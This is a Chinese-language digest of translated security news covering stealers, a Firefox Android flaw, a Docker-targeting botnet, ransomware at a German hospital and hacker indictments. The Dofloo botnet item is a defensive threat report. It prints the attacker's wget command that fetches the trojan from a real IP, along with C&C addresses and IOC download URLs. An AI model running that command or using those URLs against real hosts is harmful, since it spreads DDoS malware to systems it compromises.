安全快讯Top News

Meh 恶意程序窃取用户密码

前言 最近一段时间,我们一直在监测一种新的恶意程序,我们称之为“Meh”。这一切都是在我们遇到大量文件时开始的,这些文件的开头是随机生成的字符串,然后是一个编译的AutoIt脚本…… 分析 Meh由两个主要部分组成。 第一部分是解密器,我们将其命名为MehCrypter,它由多个阶段组成,并作为已编译的AutoIt脚本进行分发,以随机生成的字符串序列作为前缀。AutoIt解释程序将跳过此字符串序列,该解释程序将扫描确定文件格式的字节并有效地混淆文件,而不会影响其功能。 第二部分是密码窃取程序,称为Meh。窃取程序是恶意软件的核心,并具有许多功能。它能够窃取剪贴板内容,键盘记录,窃取加密货币钱包,通过种子下载其他文件等。它几乎所有功能都在子线程中执行,这些子线程是从注入的进程执行的。在下一篇博客文章中,我们将重点介绍密码窃取器。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1340/       消息来源:DECODED  ,封面来自于网络,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

攻击者利用漏洞可以通过 Wi-Fi 网络劫持 Android 版 Firefox

ESET安全研究人员Lukas Stefanko昨天在推特上发布了一条警报,报告显示最近披露的一个影响Android版Firefox的高危远程命令执行漏洞已被利用。 该漏洞最初由澳大利亚安全研究人员Chris Moberly发现,该漏洞存在于浏览器的SSDP引擎中,攻击者可以利用该漏洞将安装了Firefox的Android手机锁定为与攻击者连接到同一Wi-Fi网络的Android手机上。 SSDP是简单服务发现协议(Simple Service Discovery Protocol)的缩写,它是UPnP的一部分,用于查找网络上的其他设备。在Android中,Firefox会定期向连接到同一网络的其他设备发送SSDP发现消息,寻找第二个屏幕设备。 本地网络上的任何设备都可以响应这些广播并提供一个位置来获取UPnP设备的详细信息,然后Firefox尝试访问该位置,期望找到符合UPnP规范的XML文件。 视频链接:https://thehackernews.com/2020/09/firefox-android-wifi-hacking.html Moberly提交给Firefox团队的漏洞报告显示,受害者的Firefox浏览器的SSDP引擎可以通过简单地用一条指向Android意图URI的特制消息替换响应包中XML文件的位置,从而诱使其触发Android恶意命令。 为此,连接到目标Wi-Fi网络的攻击者可以在其设备上运行恶意SSDP服务器,并通过Firefox在附近的Android设备上触发恶意命令,这些过程无需与受害者进行任何交互。 哪些恶意命令包括自动启动浏览器和打开任何已定义的URL,据研究人员称,这足以诱使受害者提供其凭据、安装恶意应用程序以及基于周围场景的其他恶意活动。 Moberly表示,“目标只需在手机上运行Firefox应用程序。他们不需要访问任何恶意网站或点击任何恶意链接。不需要中间攻击者或安装恶意应用程序。他们只需在咖啡厅中使用Wi-Fi喝咖啡,攻击者就会控制他们的设备启动应用程序URI。” 视频链接:https://thehackernews.com/2020/09/firefox-android-wifi-hacking.html “它类似于网络钓鱼攻击,在这种攻击中,恶意网站会在他们不知情的情况下强行攻击目标,使受害者输入一些敏感信息或同意安装恶意应用程序。” Moberly在几周前向Firefox团队报告了这个漏洞,Firefox浏览器制造商目前已经在Firefox Android 80及更高版本中修补了这个漏洞。 Moberly还向公众发布了一个概念验证漏洞,Stefanko曾在上述视频中针对连接到同一网络的三个设备演示了该漏洞。   稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击 Docker 容器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ceNfVRneGGIkbFOqItU11g  一、概述 腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。 云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。 而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。 腾讯安全系列产品已支持检测Dofloo(AESDDoS)僵尸网络的最新变种,企业安全运维人员如果发现已经中招,可对照分析报告的详细内容,将攻击者下载安装的文件和启动项删除,再参考以下安全响应清单进行排查,修复Remote API允许未授权使用的漏洞,避免再次遭遇入侵。 具体响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Dofloo僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Dofloo僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Dofloo僵尸网络关联的IOCs已支持识别检测; 2)检测Docker未授权访问漏洞利用攻击。   有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Dofloo僵尸网络相关木马程序; 2)已支持Docker Daemon 2375管理端口开启的风险项检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Dofloo僵尸网络与服务器的网络通信; 2)检测Docker未授权访问漏洞利用攻击; 3)检测DDoS攻击流量;   关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、样本分析 在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。 获取容器列表: 针对运行状态的容器利用Docker EXEC执行木马下载命令: wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7 被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。 Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。 通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。 使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。 此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。 IOCs C&C 49.235.238.111:48080 175.24.123.205: 48080 IP 49.235.238.111 89.40.73.126 175.24.123.205 URL http[:]//49.235.238.111[:]88/Linux2.7 http[:]//49.235.238.111/Lov.sh http[:]//49.235.238.111/lix http[:]//49.235.238.111/Verto http[:]//49.235.238.111[:]88/NgYx http[:]//49.235.238.111/linux-arm http[:]//49.235.238.111/shre.sh http[:]//89.40.73.126[:]8080/Linux2.7 http[:]//89.40.73.126/linux2.6 http[:]//89.40.73.126[:]8080/linux-arm http[:]//89.40.73.126[:]8080/Linux2.6 http[:]//89.40.73.126[:]8080/YmY http[:]//89.40.73.126[:]8080/LTF http[:]//89.40.73.126[:]8080/NgYx http[:]//89.40.73.126[:]8080/Mar http[:]//89.40.73.126[:]8080/linux2.6 http[:]//89.40.73.126[:]8080/Flood http[:]//175.24.123.205:88/Fck MD5 Flood 0579a022802759f98bfdf08e7dd16768 Linux2.7 0b0f1684f6791d9f8c44a036aa85a2cc lix 9530e46caab834e1e66a108e15ea97ca linux-arm ca1f347447ddf7990ccd0d6744f3545d Linux 05f28784a0da0c1e406d98c02dc7d560 arm 34eeb9eaa65c4a062311a886dd0157f1 Fck df86da9e341c3a9822f30ac4eba11951 Lov.sh 83caa873cee081162c417eb8dec4a351 Rze.sh 48c910cd9a07404fbfb8bf52847e72c3 SHre.sh bb7cdf5707a857036cd41af4bafaed31 参考链接: https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py

伊朗黑客组织开发 Android 恶意软件用于窃取双因素验证短信

安全公司Check Point表示,它发现了一个伊朗黑客组织开发的特殊Android恶意软件,能够拦截和窃取通过短信发送的双因素验证(2FA)代码。该恶意软件是该公司昵称为Rampant Kitten的黑客组织开发的黑客工具库的一部分。 伪装成欧盟驾照培训辅助应用的App Check Point表示,该组织至少活跃了6年,一直在从事针对伊朗少数族裔、反对组织和抵抗运动的持续监视行动。 这些活动涉及使用广泛的恶意软件系列,包括四种Windows信息窃取工具的变种和伪装在恶意应用程序中的Android后门。 其开发的Windows恶意软件主要用于窃取受害者的个人文件,但也窃取Telegram的Windows桌面客户端的文件,这些文件允许黑客访问受害者的Telegram账户。 此外,面向Windows分支的恶意软件还窃取KeePass密码管理器中的文件,与本周早些时候发布的CISA和FBI关于伊朗黑客及其恶意软件的联合警报中的功能描述一致。 但虽然Rampant Kitten黑客偏爱开发Windows木马,但他们也为Android开发了类似的工具。 在今天发布的一份报告中,Check Point研究人员表示,他们还发现了该组织开发的一个强大的Android后门。该后门可以窃取受害者的通讯录列表和短信,通过麦克风悄悄记录受害者,并显示钓鱼页面。但更值得关注的是,该后门还包含专门针对窃取2FA(双因素认证)的代码。 Check Point表示,该恶意软件会拦截并转发给攻击者任何包含 “G-“字符串的短信,该字符串通常被用于通过短信向用户发送谷歌账户的2FA代码前缀。 其思路是,Rampant Kitten运营商会利用Android木马显示谷歌钓鱼页面,获取用户的账户凭证,然后访问受害者的账户。 如果受害者启用了2FA,恶意软件的2FA短信拦截功能就会悄悄地将2FA短信代码的副本发送给攻击者,让他们绕过2FA。 但事实并非如此。Check Point还发现有证据表明,该恶意软件还会自动转发所有来自Telegram和其他社交网络应用的接收短信。这些类型的消息也包含2FA代码,该团伙很有可能利用这一功能绕过2FA,而不是谷歌账户。 目前,Check Point表示,它发现这个恶意软件隐藏在一个Android应用内,伪装成帮助瑞典讲波斯语的人获得驾照的服务。然而,该恶意软件可能潜伏在其他针对反对德黑兰、生活在伊朗境内外的伊朗人的应用内。 虽然人们普遍认为国家支持的黑客组织通常能够绕过2FA,但我们很少能深入了解他们的工具和他们如何做到这一点。      (稿源:cnBeta,封面源自网络。)

97% 的网络安全公司在暗网上泄露了数据

安全公司ImmuniWeb在一份有关今年全球网络安全行业在暗网暴露数据的最新报告中,发现97%的领先的网络安全公司都发生了数据泄露或其他安全事件,而平均而言,每个网络安全公司会暴露4,000多个被盗凭证和其他敏感数据。 研究发现: 97%的公司在暗网上发生了数据泄露和其他安全事件。 共发现631512起经核实的安全事件,超过25%(或160529)属于高或严重风险级别事件,其中包含高度敏感的信息,例如明文凭证或PII,包括财务或类似数据。因此,平均每个网络安全公司有1586份被窃取的凭证和其他敏感数据被曝光。在ImmuniWeb的研究中还发现了超过100万个未经证实的事件(1027395),这里面只有159462个被认为是低风险的。 29%的被盗密码是弱密码。研究显示,29%的被盗密码很弱,只有不到8个字符,或者没有大写字母、数字或其他特殊字符。162家公司的约40名员工在不同的违规情况下重复使用相同的密码增加了网络犯罪分子重复使用密码攻击的风险。 色情网站和成人交友网站上使用了专业电子邮件,第三方违规行为占有很大比例,ImmuniWeb的研究发现,5121份证书从被黑客入侵的色情网站或成人交友网站上被窃取。 63%的网络安全公司的网站不符合PCI DSS要求,这意味着它们使用易受攻击或过时的软件(包括JS库和框架)或在阻止模式下没有Web应用程序防火墙(WAF)。 48%的网络安全公司的网站不符合GDPR要求。他们缺乏明显的隐私政策,当cookie包含PII或可追踪标识符时,缺少cookie免责声明。 91家公司存在可利用的网站安全漏洞,其中26%仍未修补。这一发现来自ImmuniWeb,指的是Open Bug Bounty项目中公开可用的数据。 这项研究是使用ImmuniWeb的免费在线域安全测试来进行的,该测试结合了专有的OSINT技术和机器学习,对暗网进行分类。398家领先的网络安全公司接受了测试。 美国的网络安全公司遭受的风险最高,严重,其次是英国和加拿大,再次是爱尔兰,日本,德国,以色列,捷克共和国,俄罗斯和斯洛伐克。 在接受测试的398家网络安全公司中,只有瑞士,葡萄牙和意大利的公司没有遭受任何高风险或重大风险事件,而比利时,葡萄牙和法国的公司经过验证的事件数量最少。 ImmuniWeb首席执行官兼创始人Ilia Kolochenko对这项研究发表了评论: “如今,网络犯罪分子通过针对可信赖的第三方而不是追逐最终受害者,努力实现利润最大化和被捕的风险最小化。例如,大型金融机构通常拥有强大的技术,法证和法律资源,可以及时发现并调查,经常成功地起诉大多数入侵者。 “相反,他们的第三方,从律师事务所到IT公司,通常缺乏对快速增长的针对性攻击和APT做出反应所需的内部专业知识和预算。最终,那些攻击者逍遥法外。在2020年,人们无需花费很多时间,而是找到几个不受保护的第三方,迅速破解最他们薄弱的环节。” “对于当今的任何网络安全和合规计划来说,数据,IT和数字资产的整体可见性和清单都是必不可少的。机器学习和AI等现代技术可以极大地简化和加速从异常检测到错误的大量繁重任务。但是,我们要通过不断监视深网、暗网以及Surface Web中无数的资源(包括公共代码存储库和粘贴网站),在不久的将来,这种环境可能会变得更加复杂。” 完整的研究结果可以在这里查看。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

德医院遭遇勒索软件攻击:一名患者或因此死亡

据外媒报道,一名生命垂危的患者因勒索软件攻击被迫去了更远的医院,不幸的是,这位患者最终没能被救回来。当地时间9月10日,德国杜塞尔多夫大学医院遭遇勒索软件攻击,而正是因为这个攻击他们的IT系统中断进而导致门诊治疗和紧急护理无法正常进行。 于是,那些寻求紧急护理的人只能被转移到更远的医院接受治疗。 德国媒体报道称,警方通过赎金说明联系了勒索软件运营商并解释说他们的目标是一家医院。 据悉,留在医院加密服务器上的勒索信息显示,其原本的攻击对象是杜塞尔多夫大学而非杜塞尔多夫大学医院。 在警方联系了勒索软件攻击者并解释说他们加密了一家医院之后,攻击者撤回了赎金要求并提供了解密密钥。 医院在收到钥匙后开始在缓慢地恢复系统,而调查得出的结论显示,数据应该没有被盗。 据NTV报道,杜塞尔多夫大学医院取消了紧急服务登记后,一名生命受到威胁的病人被转到了更远的医院。这种干扰导致病人在一小时后接受治疗很有可能导致了其最后的死亡。对此,德国检察官正在调查此次网络攻击是否犯下过失杀人罪。检方以涉嫌过失杀人罪对这两名身份不明的肇事者展开调查,原因是一名生命危险的病人被送到了伍珀塔尔的一家医院,而这家医院距离事发地约有32公里。 外媒BleepingComputer在新冠病毒大流行初期接触了不同的勒索软件公司看看他们是否会继续攻击医疗保健和医疗机构。对此,CLOP、DoppelPaymer、Maze和Nefilim勒索软件的运营者表示,他们不会以医院为目标,如果有医院被错误加密他们会提供免费的解密密钥。不过Netwalker表示,他们虽然不是以医院为目标,但如果他们不小心加密了一家医院,后者仍需要支付赎金。     (稿源:cnBeta,封面源自网络。)

Covid-19背景下网络攻击活动激增

大多数网络安全专业人士都会预料到,攻击者会利用围绕Covid-19流行病进行网络攻击。 当然,恶意电子邮件会包含与Covid-19相关的主题,恶意下载与Covid-19相关。这就是攻击者的运作方式。他们会抓住任何使效率最大化的机会,无论多么卑鄙。 虽然有传闻描述了有关Covid-19的网络攻击将如何展开的问题,但我们几乎没有数据支持Covid-19对网络安全的实际影响。有几家公司报告显示,与Covid-19相关主题的恶意电子邮件数量已经增长了百分之几百,现在大多数与Covid-19相关的电子邮件都是恶意的。 除了与Covid-19相关的恶意电子邮件、视频和一系列可下载文件的增加之外,背后还发生了什么? 有趣的是,网络安全公司Cynet刚刚发布了一份报告(在这里下载),详细描述了自Covid-19流感爆发以来,他们在北美和欧洲观察到的网络攻击的变化。该报告分享了一些有趣的发现,例如在各个行业部门观察到的网络攻击量的变化、网络钓鱼作为初始攻击载体的使用增加以及在网络钓鱼攻击中分发恶意软件的方法。 Cynet发现,攻击者不仅仅是“某种程度上”,而是正在全力以赴地利用Covid-19。攻击者正在拿出他们的全部新的攻击方法,以确保攻击成功。 报告指出,使用新技术进行攻击的比例在20%左右。也就是说,80%的攻击都使用了很容易识别的众所周知的技术(前提是公司已经更新了预防措施)。 自Covid-19流感以来,Cynet发现新的攻击占所有攻击的35%。新的攻击技术仅靠杀毒软件是无法充分检测到的,只有使用新的行为检测机制才能有效地发现新的攻击技术。也就是说,必须使用新的检测方法来检测正在部署的新攻击技术。 请求检测和响应团队(Cynet称之为cypos)的专家帮助的客户数量激增。在流感大流行期间,客户参与率高达250%。 除了使用先进的检测和响应机制外,还需要深厚的网络安全技能来检测和缓解在Covid-19流感期间部署的新攻击技术的急剧上升。 不幸的是,许多公司还没有先进的检测和响应技术,例如扩展检测和响应(XDR)或对全天候管理的检测和响应(MDR)团队的持续访问。当使用新技术的网络攻击在这场大流行期间激增时,没有这些先进保护措施的公司将面临更高的风险。 为了您的网络安全,我们强烈建议您关注XDR和MDR解决方案,使用威胁搜索技术来搜索您的系统,提防新的恶意软件攻击。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

美司法部起诉五名中国公民 指控其对 100 多家企业发动黑客攻击

9月16日,美国政府指控APT41黑客组织的5名中国公民和2名马来西亚黑客,对全世界100多家公司发动黑客攻击。 这家名为APT41、又被称为“Barium”、“Winnti”、“邪恶熊猫”和“邪恶蜘蛛”的网络间谍组织至少从2012年就开始运作了,它不仅参与了从许多领域的有价值目标那里收集战略情报,而且还参与了对在线游戏行业的攻击。 美国司法部公布的新闻稿显示,五名中国黑客中的两名成员——张浩然和谭代林,于2019年8月被起诉,另外三名成员——蒋立志、钱川和付强,还有两名马来西亚同谋在2020年8月分别被起诉。 后来被起诉的三名中国黑客与一家网络安全公司——成都肆零肆公司有关联。 “至少从2008年开始,付就一直与蒋密切合作,并与蒋在多家互联网和视频游戏相关公司工作。付至少从2013年就开始与钱和蒋合作。在加入成都肆零肆公司之前,付自称是一名熟练的程序员和开发人员。 正如之前在多份报告中发现的,APT41集团专门从事软件供应链攻击,黑客窃取专有的“源代码、软件代码签名证书、客户帐户数据和有价值的商业信息”,并分发经过数字签名的恶意软件版本,以感染目标组织的系统。 法庭文件显示,在一些目标系统没有任何有价值的信息的情况下,被告还使用勒索软件和密码劫持恶意软件来赚钱。 目标产业包括“软件开发公司、计算机硬件制造商、电信供应商、社交媒体公司、电子游戏公司、非营利组织、大学、智囊团和外国政府,以及香港的民主政界人士和活动家。” 新闻稿显示:“被告还破坏了印度和越南的外国政府计算机网络,并锁定了英国的政府计算机网络。” 两名马来西亚黑客王安华(音译)和凌扬青(音译)于2020年9月14日在西塔万被马来西亚当局逮捕,目前正被引渡到美国。联邦调查局表示,5名中国公民仍然在逃。 “除了对所有被控被告发布逮捕令外,美国哥伦比亚特区地方法院于2020年9月签发了扣押令,他们最近扣押了数百个被告用于操作其计算机的帐户、服务器、域名和指挥控制(C2)“死机”网页。 “微软(谷歌、Facebook和Verizon Media除外)的行动是阻止被告继续访问黑客基础设施、工具、账户以及指挥和控制域名的整体努力的重要组成部分。” 目标公司位于美国和世界各地,包括澳大利亚、巴西、智利、香港、印度、印度尼西亚、日本、马来西亚、巴基斯坦、新加坡、韩国、台湾、泰国和越南。 张某和谭某被控25项电脑诈骗和洗钱罪,最高可判20年监禁。 蒋、钱、傅也面临着类似的指控的9项罪名,最高可判20年监禁。 王、凌被指控23项类似罪名,但由于他们也涉及虚假注册域名,因此将把洗钱罪的最高刑期增至27年。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

美国起诉 2 名黑客,称其为报复伊朗将军遭暗杀而攻击多家网站

据俄塔社15日报道,美国司法部网站在周二发布声明称,美国当局起诉了两名“黑客”,称他们为报复美国暗杀伊朗“圣城旅”前指挥官卡西姆·苏莱曼尼将军而对美国进行了网络攻击。 美国司法部称,一名19岁的伊朗人和一名25岁的巴勒斯坦人被控犯有网络攻击罪和串谋实施网络攻击。美国负责国家安全事务的助理司法部长约翰·德默斯称,“作为报复美国开展军事行动暗杀苏莱曼尼一事的运动的一部分,这两名黑客攻击了无辜的第三方。”德默斯强调,这两人正在伊朗和巴勒斯坦“躲藏起来,避免遭受审判”。 美国当局指控称,这两名“黑客”于2019年12月开始合作,在美国国防部今年1月3日宣布在伊拉克巴格达国际机场附近开展无人机袭击打死苏莱曼尼之后,他们入侵了58个美国网站。在遭到攻击之后,这些网站的页面上都出现了以伊朗国旗为背景的苏莱曼尼将军的肖像,上面用英语写着“Down with America”。 美国司法部网站声明截图 美国司法部在声明中强调,这些被指控的黑客如果承认自己犯有共谋罪,将面临最高5年的监禁和最高25万美元的罚款,如果被控实施网络犯罪,将面临最高10年的监禁,以及最高25万美元的罚款。目前,美国马萨诸塞州地方法院正在审理此案。 在美国空军去年12月29日对伊拉克民兵组织“真主党旅”位于叙利亚和伊拉克境内的5个目标发动数次袭击之后,中东局势急剧升级。美国五角大楼当时表示,“真主党旅”对此前发生在伊拉克基尔库克基地的袭击事件负有责任,袭击导致美国一名平民雇员丧生。 伊朗将军苏莱曼尼 资料图 1月3日,美国国防部宣布美军在巴格达机场附近发动无人机袭击打死伊朗将军苏莱曼尼,并表示袭击其实是“防御性的”,目的是保护驻伊拉克美军和其他国家的军队。美方还指出,苏莱曼尼似乎同意在美国驻巴格达大使馆前举行抗议活动。作为回应,伊朗在1月8日凌晨对美军在伊拉克的两个目标:艾因-阿萨德基地和埃尔比勒机场发动了导弹袭击。     (稿源:新浪科技,封面源自网络。)

新兴的 URSA 木马使用复杂的加载程序影响了许多国家

前言 2020年6月以来,新一波URSA木马程序(ESET称之为mispadu恶意软件)已影响到多个国家的用户,包括玻利维亚、智利、墨西哥、阿根廷、厄瓜多尔、秘鲁、哥伦比亚、巴拉圭、哥斯达黎加、巴西、西班牙、意大利和葡萄牙。此软件是恶意木马,当安装在受害者的设备上时,它从浏览器和流行软件(如FTP和电子邮件服务)收集密码,并执行银行浏览器覆盖,以诱使受害者介绍银行凭证,这些流程由攻击者在后台逐步执行。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1338/     消息与封面来源:Seguranca-Informatica  ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。